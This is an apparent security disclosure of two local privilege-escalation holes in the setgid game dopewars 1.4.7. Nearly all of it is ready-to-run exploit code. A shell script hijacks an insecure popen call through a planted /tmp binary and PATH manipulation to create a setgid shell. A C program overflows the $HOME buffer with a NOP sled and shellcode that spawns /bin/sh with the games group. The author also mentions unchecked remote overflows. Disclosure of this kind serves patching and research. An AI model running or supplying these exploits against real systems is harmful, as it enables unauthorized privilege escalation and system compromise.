two security holes i found for local use in dopewars(1.4.7-current).  dopewars
is setgid=games.  by: Vade79->v9[v9@fakehalo.org].


LOCAL VULNERABILITY #1: insecure popen call, a shell script can handle this.

-- dopewars.sh start --

#!/bin/sh
# dopewars.sh(1.4.7): shell script by Vade79->v9@fakehalo.org.  gives gid=games.
# insecure use of a popen call while setgid isn't good in any situation.

DOPEWARS=`which dopewars`
if [ "$DOPEWARS" ]; 
 then echo "[*] dopewars binary found: $DOPEWARS."
 else echo "[!] dopewars binary was not found, aborted.";exit
fi
CHECK=`ls -l $DOPEWARS | grep sr-`
if [ "$CHECK" ]; 
 then echo "[*] dopewars found to be setgid, proceeding."
 else echo "[!] dopewars NOT found to be setgid, aborted.";exit
fi
PATH=/tmp:$PATH
cp /bin/sh /tmp/gidsh
echo 'main(){system("chgrp games /tmp/gidsh;chmod 2755 /tmp/gidsh");}'>/tmp/more.c
cc /tmp/more.c -o /tmp/more
cat <<X>/tmp/dopecmds
help
quit
X
dopewars -s</tmp/dopecmds 1>/dev/null 2>&1
rm -f /tmp/more* /tmp/dopecmds
CHECK=`ls -l /tmp/gidsh | grep sr-`
if [ "$CHECK" ]; 
 then echo "[*] success, setgid shell is in: /tmp/gidsh."
 else echo "[!] failed, the setgid shell doesn't exist."
fi

-- dopewars.sh end --


LOCAL VULNERABILITY #2: $HOME buffer overflow in versions 1.4.3-7(current).

-- dopewars_bof.c start --

/* (linux)dopewars[v1.4.3+] local buffer overflow, by v9[v9@fakehalo.org].
   dopewars is SGID(=2755)=games by install(make install).  this overflow is
   true for versions of dopewars 1.4.3 to 1.4.7(current).

   syntax: ./dopewars_bof [offset] [alignment(0-3)]
           ./dopewars_bof -200 1

   the basic overlow(dopewars.c):
   --
   pt=getenv("HOME");
   if (!pt) return;
   if (strlen(pt) > 770) {
      sprintf(ConfigFile,"Home directory %s too long.",pt);
      ReportError(ConfigFile);
      return;
   }
   sprintf(ConfigFile,"%s/.dopewars",pt);
   --
   "the home directory is too long! so what? lets contiune anyways."

   note: even in the current version of dopewars(1.4.7) there appear to be some
         remote overflow possibilities from server->client(bof the client with
         a bogus server).  you can even overflow the server just by simply
         sending a large string(eip=0x0..).  i am just making a note of lots of
         unchecked buffers.  also, $HOME is too common a overflow for this to
         occur. :) */

#define PATH "/usr/local/bin/dopewars"	// path to the dopewars program.
#define GID 20				// group id of games.
#define DEFAULT_OFFSET 200		// if no argument #1.
#define DEFAULT_ALIGN 1			// if no argument #2.

static char exec[]=
 "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
 "\x00" // soon to be gid=games.
 "\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
 "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
 "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
 "\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
 "\x6e\x2f\x73\x68\x01"; // my usual shellcode for these situations :)

long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[800];
 int i,offset,align;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 if(argc>2){
  if(atoi(argv[2])>3||atoi(argv[2])<0){printf("%s: %s is an invalid alignment, use 0-3.\n",argv[0],argv[2]);exit(-1);}
  else{align=atoi(argv[2]);}
 }
 else{align=DEFAULT_ALIGN;}
 ret=(esp()-offset);
 printf("[ return addr: 0x%lx, offset: %d, alignment: %d. ]\n",ret,offset,align);
 exec[10]=GID;
 for(i=align;i<800;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(800-strlen(exec)-50);i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("HOME",bof,1);
 if(execlp(PATH,"dopewars",0)){
  printf("%s: defined path %s did not execute correctly.\n",argv[0],PATH);
  exit(-1);
 }
}

-- dopewars_bof.c end --

Vade79 -> v9@fakehalo.org -> www.fakehalo.org.